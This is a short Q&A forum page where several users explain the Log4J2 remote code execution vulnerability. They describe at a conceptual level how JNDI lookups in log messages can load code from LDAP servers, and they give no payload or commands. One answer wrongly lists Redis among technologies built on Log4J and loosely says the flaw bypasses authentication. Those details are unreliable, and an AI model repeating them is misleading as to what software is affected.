What is the Log4J2 security vulnerability?
AMZ EMPLOYEE
Last updated on
Your thoughts?
Share your thoughts
The reason why no software engineers were around to hang out the weekend of Dec 10 :)
The worst :)
A remote code execution vulnerability found with a popular logging framework used in Java.
RCE attack made possible by Apache Logging project.
A Java based security exploit that affects millions of applications.
Log4J is a very popular logging framework used with popular technologies like Spring Boot, Kafka, Redis, etc. One of it's key features includes property substitution where log output is dynamically generated based on lookup values.
For example if you want to get the runtime environment in your log output you may do something like:
The problem with this is Log4J allows different protocols/methods for "looking things up". One of these methods is JNDI lookup.
What they found was these JNDI lookups can be used to bypass authentication and other security measures to run remote execution of malicious code hosted on LDAP servers.